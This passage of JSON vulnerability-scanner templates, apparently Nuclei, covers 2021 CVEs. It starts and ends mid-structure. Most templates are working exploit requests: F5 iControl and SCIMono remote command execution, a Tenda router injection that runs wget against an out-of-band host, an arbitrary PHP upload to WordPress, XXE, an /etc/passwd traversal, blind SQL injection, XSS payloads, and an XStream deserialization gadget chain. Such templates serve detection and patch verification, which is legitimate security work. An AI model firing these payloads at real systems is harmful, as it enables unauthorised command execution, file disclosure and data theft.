HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  